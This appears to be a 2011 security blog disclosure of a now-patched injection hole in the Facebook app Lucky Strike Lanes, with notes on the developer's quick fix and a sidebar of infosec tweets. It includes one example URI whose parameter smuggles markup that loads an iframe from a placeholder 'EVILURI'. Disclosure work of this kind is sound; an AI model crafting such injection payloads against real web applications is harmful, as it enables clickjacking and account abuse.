FAXX Hack: Lucky Strike Lanes

Facebook Verified Application

Current Monthly Active Users: 83,243

Current Rank on Application Leaderboard: 539

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/luckystrikelanes/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

RT @jeremiahg "Tumblr.com CSRF domain hijack" http://t.co/pvxfB9hn < CSRF getting more of the attention it deserves
about 38 seconds ago from web
And use Twitter. RT @mubix RT @InsiderThreats Regardless of where you are in InfoSec career, a list worth bookmarking. http://t.co/9lCMPCbD
09:01:50 PM October 28, 2011 from web
Percentage of computer freezes I've had in the past month that were caused by Adobe Flash: 100%. Also, this is useful: http://t.co/IiG268A1
05:00:45 PM October 28, 2011 from web
For anyone who still thinks JavaScript is just a lightweight scripting language, here's an H.264 decoder built in JS: http://t.co/hkPG8UnG
04:45:32 PM October 28, 2011 from web
Heh... Facebook: "Only 0.06% of logins compromised daily!" Tech media: "As many as 600,000 FB logins compromised daily!"
03:34:58 PM October 28, 2011 from web

FAXX Hack: Lucky Strike Lanes

Leave a Reply

Further Updates from Twitter

Search Archives

Facebook Page

Content License

Post Archives